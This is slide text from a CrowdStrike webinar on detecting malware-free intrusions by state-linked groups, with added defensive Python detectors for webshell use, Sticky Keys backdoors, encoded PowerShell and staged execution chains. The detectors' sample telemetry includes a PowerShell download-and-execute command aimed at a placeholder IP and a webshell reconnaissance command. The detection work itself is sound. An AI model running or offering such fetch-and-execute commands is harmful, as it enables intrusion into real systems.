This document summarizes a CrowdStrike webinar on detecting advanced malware-free intrusions. It introduces the three speakers from CrowdStrike (Dmitri Alperovitch, Chris Scott, and Adam Meyers), then discusses how China-based and other state-sponsored and criminal groups are adapting their tradecraft to evade indicator-based detection, and why security teams must shift from sweeping for indicators of compromise to real-time monitoring of adversary activity on the endpoint. The webinar includes a case study of detecting a webshell attack in near real time using CrowdStrike Falcon Host and concludes with a demonstration of its endpoint protection capabilities.
CrowdCasts Monthly: When Pandas Attack
1. WHEN PANDAS ATTACK
HOW TO DETECT, ATTRIBUTE, AND RESPOND TO
MALWARE-FREE INTRUSIONS
Dmitri Alperovitch - Chris Scott - Adam Meyers
2. TODAY’S SPEAKERS
2014 CrowdStrike, Inc. All rights reserved. 2
@DMITRICYBER
@CROWDSTRIKE | #CROWDCASTS
DMITRI ALPEROVITCH | CO-FOUNDER & CTO
Dmitri Alperovitch is the Co-Founder and CTO of CrowdStrike. A renowned computer security researcher, he is a thought leader on cybersecurity policy and state tradecraft. Prior to founding CrowdStrike, Dmitri was Vice President of Threat Research at McAfee, where he led the company's global internet threat intelligence analysis and investigations. In 2010 and 2011, Alperovitch led the global team that investigated and brought to light the groundbreaking Operation Aurora, Night Dragon and Shady RAT cyberespionage intrusions, and gave those incidents their names.
3. TODAY’S SPEAKERS
@NETOPSGURU
CHRIS SCOTT | DIRECTOR, SERVICES
Christopher Scott has over 15 years of Fortune 500/DoD/DIB business proficiency, including more than 7 years of targeted threat detection and prevention expertise. As a Director at CrowdStrike Services, Christopher supports a variety of engagements, including security reviews, incident response, data loss prevention, insider threat analysis, engineering of threat detection systems, and business continuity and disaster recovery processes. In addition, Christopher assists in building risk recognition systems and advancing the CrowdStrike Services practice.
4. TODAY’S SPEAKERS
@ADAM_CYBER
ADAM MEYERS | VP, INTELLIGENCE
Adam Meyers has over a decade of experience within the information security industry. He has authored numerous papers that have appeared at peer-reviewed industry venues and has received awards for his dedication to the field. At CrowdStrike, Adam serves as the VP of Intelligence. In this role, Adam oversees all of CrowdStrike's intelligence gathering and cyber-adversary monitoring activities. Adam's Global Intelligence Team supports both the Product and Services divisions at CrowdStrike, and Adam manages these efforts.
5. ADVANCED ATTACKERS EVADE IOC-BASED DETECTION
HOW CAN YOU FIND AN ATTACK WHEN THERE IS NO MALWARE, NO COMMAND AND CONTROL, AND NO FILE-BASED ARTIFACTS?
7. LET'S DIVE IN…
WHO'S BEHIND THE ATTACK?
8. UNCOVER THE ADVERSARY
RUSSIA
Energetic Bear: Oil and Gas Companies
CHINA
Comment Panda: Commercial, Government, Non-profit
Deep Panda: Financial, Technology, Non-profit
Foxy Panda: Technology & Communications
Anchor Panda: Government organizations, Defense & Aerospace, Industrial Engineering, NGOs
Impersonating Panda: Financial Sector
Karma Panda: Dissident groups
Keyhole Panda: Electronics & Communications
Poisonous Panda: Energy Technology, G20, NGOs, Dissident Groups
Putter Panda: Governmental & Military
Toxic Panda: Dissident Groups
Union Panda: Industrial companies
Vixen Panda: Government
IRAN
Magic Kitten: Dissidents
Cutting Kitten: Energy Companies
INDIA
Viceroy Tiger: Government, Legal, Financial, Media, Telecom
NORTH KOREA
Silent Chollima: Government, Military, Financial
CRIMINAL
Singing Spider: Commercial, Financial
Union Spider: Manufacturing
Andromeda Spider: Numerous
HACKTIVIST/TERRORIST
Deadeye Jackal: Commercial, Financial, Media, Social Networking
Ghost Jackal: Commercial, Energy, Financial
Corsair Jackal: Commercial, Technology, Financial, Energy
Extreme Jackal: Military, Government
9. PARACEL ISLANDS
Disputed Territory
• 16°40′N 112°20′E
• Claimed by:
– Vietnam (Hoàng Sa Archipelago)
– People's Republic of China (Xisha Islands)
– Taiwan
• Originally occupied by the French in 1938, the islands were taken by Japan and then by China after World War II
• In 1974, armed conflict ended with the islands occupied by victorious PLA forces over the ARVN; unified socialist Vietnam has since renewed its claims
10. HAIYANG SHIYOU 981
May 2, 2014
• Owned by: CNOOC Group
– Displacement: 30,670 tons
– Length: 114 meters
– Beam: 90 meters
– Speed: 8 knots
– Crew: 160
• Mission: Evaluate potential for Oil
Reserves
• In theater 2 May – 16 Jul
11. CHINESE INTRUSION ACTIVITY, MAY/JUNE
[Chart: increasing activity as the conflict escalates]
12. HD981 OPERATIONS MAY - JULY
Increasing tensions and intrigue
• 2 May: HD981 deployed near the Paracel Islands
• 26 May: Vietnamese fishing boat sinks after a confrontation with Chinese vessels
• June: tensions continue to rise as HD981 moves closer to the Paracel Islands and conducts drilling
• 16 July: HD981 leaves the Paracel Islands in advance of typhoon season and to 'review data' from drilling operations
13. ISLAMIC STATE OF IRAQ AND SYRIA (ISIS): BAIJI
Mid June 2014
• Sunni extremists from ISIS begin an advance on the key Iraqi industrial city of Baiji
• 12 June: ISIS vehicles and personnel burn down the courthouse and police station, and release prisoners from the jail
• 18 June: ISIS insurgents begin attacking the Baiji refinery, the largest in Iraq, which has the capacity to refine over 300,000 barrels of oil per day
14. CHINA OIL AT RISK
[Chart: Top Oil Imports]
15. WHAT HAPPENED?
THIS IS A STORY OF THE INCIDENT…
16. CASE STUDY: WEBSHELL ATTACK
• Suspicious Logins Detected within Environment
• Falcon Host Deployed to the Network with CSOC Monitoring
– Deployment Time is now Hours not Days
– The Cloud Allows Rapid Deployment and Increased Visibility
• Not Dependent on Hardware
• No Infrastructure to Standup
• Visibility on Adversary Actions
– Webshell Deployments and Usage
– Usage of Sticky Keys
– Usage of PowerShell with Custom Encryption
17. CASE STUDY: WEBSHELL ATTACK
• Watching the Adversary Change TTPs in Real-time
– Uploading New Tools, Monitoring for Logons
• Security Teams able to Respond within Minutes
– Removal of Infected Machines
– Memory Capture with Attacker Tools Running
• Reduction in Incident Response Timing
– Remediate Quicker
– Reduce the Need for Deep Dive Forensics
– Reduce the Cost of Incident Response
• Continued Visibility Going Forward
– Detections Allowing Security Teams to Prevent Attacker Foothold
18. ADVERSARIES ADJUSTING TTPS
Changes to Persistence
• Moving from Workstations back to Servers
• Reducing Footprint
Forensic Evidence Reduction
• Utilizing Memory for Execution, Compression,
Exfiltration
• Automated Cleanup Processes
Simplified Toolsets and Communication
Webshells
• Compiled on the Fly, Direct to Memory
• Utilize SSL Certificates on External Accessible Sites
• Utilize Custom Encryption within Microsoft
PowerShell
19. SECURITY TEAMS MUST ADJUST
New Detection Methods
• Must be Real-time or Near-Real-time; Sweeping for IOCs is a Losing Proposition
• Must Detect Credential Theft as it Happens
• Must Capture Adversaries' Commands as Forensic Evidence is Being Reduced
Benefits of Detection Methods
• Able to Respond Quicker
• Reduce Exposure and Loss
• Allow Security Teams to Adjust to Adversary TTPs on
the Fly
• Increasing Costs to the Adversary
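The three TTPs the case study names (webshell usage, Sticky Keys, PowerShell with an encoded command) written as process-creation detections of the real-time kind slide 19 calls for. This is an added example, not CrowdStrike's Falcon Host logic; it assumes Sysmon-style process-creation records with Image, ParentImage and CommandLine fields, and every sample event, path and address below is constructed. The PowerShell rule decodes only the standard -EncodedCommand Base64 layer; the custom encryption slide 18 mentions lives inside that decoded script, which is exactly why the decoded command has to be captured at execution time rather than recovered later from disk.

```python
"""
Near-real-time detections for the three malware-free TTPs called out in the
case study: command execution through a webshell, a Sticky Keys backdoor, and
PowerShell launched with an encoded command.  Added example, not CrowdStrike
code.  Event records mirror the Sysmon Event ID 1 (process creation) fields
Image, ParentImage and CommandLine; every sample below is constructed.
"""
import base64
import re

# Web-server worker processes.  A shell spawned by one of these is the
# footprint of a webshell being *used*, and it shows up even when the shell
# was compiled straight into memory and never touched disk.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "tomcat.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Accessibility helpers winlogon.exe launches at the logon screen.  If one of
# them, or winlogon itself, spawns a shell, sethc.exe/utilman.exe has been
# replaced or hijacked through an Image File Execution Options debugger.
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                 "magnify.exe", "displayswitch.exe", "atbroker.exe"}

# "-e", "-enc", "-EncodedCommand": PowerShell accepts any unambiguous prefix.
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Plaintext of a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    for m in ENC_FLAG.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                return base64.b64decode(m.group(2)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def inspect(event: dict) -> list:
    """Return (rule, detail) hits for one process-creation event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    hits = []
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append(("webshell_command", f"{parent} spawned {image}"))
    if image in SHELLS and (parent in ACCESSIBILITY or parent == "winlogon.exe"):
        hits.append(("sticky_keys_backdoor", f"{parent} spawned {image}"))
    if image == "powershell.exe":
        plain = decode_encoded_command(event.get("CommandLine", ""))
        if plain is not None:
            # Record the decoded command itself: it is the forensic artifact
            # that would otherwise never reach disk.
            hits.append(("powershell_encoded", plain))
    return hits


def run(events) -> list:
    """Stream events through inspect(); returns (pid, rule, detail) triples in order."""
    return [(e["ProcessId"], rule, detail) for e in events for rule, detail in inspect(e)]


# --- constructed sample telemetry (203.0.113.0/24 is a documentation range) ---
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
ENCODED = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ProcessId": 4812, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": 'cmd.exe /c "whoami & net user"'},
    {"ProcessId": 1120, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\sethc.exe",
     "CommandLine": "cmd.exe"},
    {"ProcessId": 5204,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"ProcessId": 3300, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for pid, rule, detail in run(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

Run it directly to print the three hits; the explorer.exe record is a benign control that matches no rule. None of the rules needs a file hash, a command-and-control address or a file on disk, which is the point slide 5 makes about malware-free intrusions.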
20. NOW WHAT?
HOW DID WE DETECT AND ATTRIBUTE THIS MALWARE-FREE INTRUSION?
22. REAL-TIME STATEFUL EXECUTION INSPECTION
Step 1: Email Received
Step 2: Email Attachment Opened in Acrobat Reader
Step 3: Process Silently Executed
Step 4: Executable Saved in Windows/System32 Folder
Step 5: Executable Hides Itself From Task Manager
Step 6: Executable Modifies Windows Registry to Autostart
Step 7: Executable Calls Out to the Internet
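The seven-step chain above, scored statefully rather than by any single indicator: a file write into System32 or a Run-key change is unremarkable on its own, but accumulated along one process lineage that started under a document reader it becomes an alert, and it fires mid-chain rather than after the callout. This is an added example and not CrowdStrike's Falcon Host logic. It assumes Sysmon-style process-creation, file-write, registry, remote-thread and network events; the "hides itself from Task Manager" step is represented as a thread injected into taskmgr.exe, which is an assumption about how the hiding is done; and every sample event, path and address is constructed.

```python
"""
Stateful execution inspection: score each process by the chain of behaviours
its lineage has exhibited so far, instead of matching any single indicator.
Added example, not CrowdStrike's Falcon Host logic.  Event shapes loosely
mirror Sysmon process-creation, file-write, registry, remote-thread and
network events; every sample event, path and address below is constructed.
"""
from collections import defaultdict

DOCUMENT_READERS = {"acrord32.exe", "winword.exe", "excel.exe"}
SYSTEM32 = "c:\\windows\\system32\\"
AUTOSTART_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")

# Each behaviour is ordinary on its own (installers drop files into System32
# and register autostarts all day); the weights only add up along a chain.
WEIGHTS = {
    "spawned_from_document": 2,   # step 3: launched under a document reader
    "dropped_to_system32": 1,     # step 4
    "tampers_with_taskmgr": 2,    # step 5: assumed to be a thread injected into taskmgr.exe
    "registry_autostart": 1,      # step 6
    "network_callout": 1,         # step 7
}
ALERT_THRESHOLD = 4


def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


class ExecutionTracker:
    """Per-process state kept across events, keyed by pid."""

    def __init__(self):
        self.image = {}                  # pid -> image name
        self.ancestors = {}              # pid -> image names of every ancestor
        self.stages = defaultdict(set)   # pid -> behaviours observed so far
        self.alerted = set()

    def score(self, pid: int) -> int:
        return sum(WEIGHTS[s] for s in self.stages[pid])

    def on_event(self, ev: dict):
        """Fold one event into the state; return an alert dict the moment a chain crosses the threshold."""
        pid, kind = ev["pid"], ev["type"]
        if kind == "process_create":
            self.image[pid] = _name(ev["image"])
            parent = ev["ppid"]
            inherited = self.ancestors.get(parent, set())
            self.ancestors[pid] = inherited | ({self.image[parent]} if parent in self.image else set())
            if self.ancestors[pid] & DOCUMENT_READERS:
                self.stages[pid].add("spawned_from_document")
        elif kind == "file_write" and ev["path"].lower().startswith(SYSTEM32):
            self.stages[pid].add("dropped_to_system32")
        elif kind == "remote_thread" and _name(ev["target_image"]) == "taskmgr.exe":
            self.stages[pid].add("tampers_with_taskmgr")
        elif kind == "registry_set" and any(k in ev["key"].lower() for k in AUTOSTART_KEYS):
            self.stages[pid].add("registry_autostart")
        elif kind == "network_connect":
            self.stages[pid].add("network_callout")

        if pid not in self.alerted and self.score(pid) >= ALERT_THRESHOLD:
            self.alerted.add(pid)
            return {"pid": pid, "image": self.image.get(pid), "score": self.score(pid),
                    "chain": sorted(self.stages[pid]),
                    "ancestors": sorted(self.ancestors.get(pid, set()))}
        return None


def replay(events) -> list:
    """Run events through a fresh tracker in order; returns the alerts raised."""
    tracker = ExecutionTracker()
    return [alert for alert in map(tracker.on_event, events) if alert]


# --- constructed sample telemetry: the slide's seven steps, then a control ---
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE"},  # 1 email received
    {"type": "process_create", "pid": 300, "ppid": 200, "image": r"C:\Program Files\Adobe\Reader\AcroRd32.exe"},    # 2 attachment opened
    {"type": "process_create", "pid": 400, "ppid": 300, "image": r"C:\Users\alice\AppData\Local\Temp\dropper.exe"},  # 3 silently executed
    {"type": "file_write", "pid": 400, "path": r"C:\Windows\System32\update.exe"},                                  # 4 saved in System32
    {"type": "remote_thread", "pid": 400, "target_image": r"C:\Windows\System32\taskmgr.exe"},                     # 5 hides from Task Manager
    {"type": "registry_set", "pid": 400, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update"},     # 6 autostart
    {"type": "network_connect", "pid": 400, "dst": "203.0.113.5:443"},                                             # 7 call out
    # Control: an installer launched from Explorer performs three of the same actions.
    {"type": "process_create", "pid": 500, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe"},
    {"type": "file_write", "pid": 500, "path": r"C:\Windows\System32\drivers\vendor.sys"},
    {"type": "registry_set", "pid": 500, "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray"},
    {"type": "network_connect", "pid": 500, "dst": "198.51.100.7:443"},
]

if __name__ == "__main__":
    for alert in replay(SAMPLE_EVENTS):
        print(alert)
```

Replayed in order, the dropper crosses the threshold at step 5 (document lineage, System32 write, Task Manager tampering), before it has registered an autostart or called out, so a team acting on the alert gets ahead of the persistence and the command-and-control traffic. The installer ends with a score of 3 and never alerts, even though two of its three actions are identical to the dropper's.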
23. LET'S TAKE A LOOK…
ENDPOINT PROTECTION DEMO
24. Q&A
Please enter all questions in the Q&A panel of GoToWebinar
For information on the CrowdStrike Falcon Platform or CrowdStrike Services, contact sales@crowdstrike.com